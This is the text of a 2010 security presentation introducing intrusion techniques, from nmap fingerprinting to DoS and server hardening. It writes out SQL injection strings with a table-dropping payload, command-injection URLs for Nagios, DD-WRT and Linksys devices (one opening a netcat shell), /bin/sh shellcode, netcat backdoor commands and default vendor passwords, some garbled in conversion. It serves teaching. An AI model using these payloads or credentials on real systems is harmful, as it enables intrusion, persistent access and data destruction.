Intrusion Techniques

Ewerson Guimarães (Crash)

Rener Silva (Gr1nch)

DcLabs Hacking Tour 2010

FingerPrint

Web-Bugs

Backdoors

Brute Force

ShellCode

Exploits

Sniffers

Scanners/Fuzzers

Agenda

MetaSploit

IIS SemiColon

Man-in-the-Middle

FingerPrint

The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper)

Basic commands:

nmap host (Basic)nmap –sV host (Service Versions)nmap –P0 host ( ICMP ECHO-REPLY Ignore)nmap –O host (Try to grab O.S version)nmap –f host (Firewall/IDS/IPS Evasion)

Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics.

Passive - FingerPrint

• TTL - What the operating system sets the Time To Live on the outbound packet

• Window Size - What the operating system sets the Window Size at.

• DF - Does the operating system set the Don't Fragment bit.

• TOS - Does the operating system set the Type of Service, and if so, at what.

FingerPrint

Matrix:

FingerPrint

U. Bourne

Web Vulnerability

SQL-Injection

Cross Site (XSS)

Cross Site Request Forgery (CSRF)

CGI’s Command Injection

PHP-Injection

These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes

Web Vulnerability

SQL-Injection

It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application.

SELECT campos FROM tabela WHERE campo = 'test@test.com';

Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x';

admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a

' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a

" or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a

or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;--

' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a

SQL-Injection

Web Vulnerability

CGI Command Injection

It occurs when the attacker insert a series of commands exploiting vulnerable CGI scripts

Nagios:https://www.xxx.com/nagios/cgi-bin/statuswml.cgi?ping=173.45.235.65%3Becho+%24PATH

DD-WRT http://www.xxx.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh

Linksys –Wireless/setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;/bin/ps aux&message= HTTP/1.1

ShellCode Introduction

#include <stdio.h>main(){

char *comando[2];comando[0]="/bin/sh";comando[1]=NULL;execve(comando[0],comando,NULL);

:}char shellcode[] ="xebx1fx5ex89x76x0ax31xc0x88x46x09x89x46x0exb0x0bx89" "xf3x8dx4ex0ax8dx56x0excdx80x31xdbx89xd8x40xcdx80xe8" "xdcxffxffxff/bin/sh";

Exploits

Kinds of Exploits:

Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries

Remote: It works over a network connection and exploit the vulnerable target without any prior access to it.

www.securityfocus.comwww.milw0rm.comwww.secunia.comwww.exploit-db.com

0Days –It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$

Backdoors/RootKits

Used to maintain access to the system

We can Netcat use for this purpose nc –vv –l –p 5555nc –vv –l –p 5555 –e /bin/bashnc <ip> <port>

RootKits

The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's systemExample: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others.

Default/Weak passwords

Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration.

As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit)

Ex: Sw 3Com: User: securityPass: security

FireBird:User: sysdbaPass: masterkey

Weak: Passwords that are easily guessed or in a keyboard sequential Ex:123456loveHouse´s phoneBirthday Etc...

Brute Force

It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a passwordEx:

John the Ripper HydraSSH Brute Force

Brute Force

DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers

Scanners/Fuzzers

There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities

Saint

W3af Nexpose Community

Scanners/Fuzzers

Nexpose Community

Scanners/Fuzzers

W3af

Scanners/Fuzzers

Saint

Sniffers

Sniffer monitors and analyzes network traffic. Some of these packetsmay contain critical information (such as logins, passwords and cool infos )WhireShark -

DoS

Denial of Service, consist of attempts to prevent valid users from using a particular feature or simply drop it

SYN FLOOD

UDP Packet Storm

DDoS

Smurf Attack

MetaSploit

MetaSploit

IIS SemiColon

Secure it? Wtf?

Man-in-the-Middle

Hardening your server

HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system.

http://hntool.net

UAI?gr1nch@dclabs.com.br

crash@dclabs.com.br irc.freenode.net#dclabs#securityguys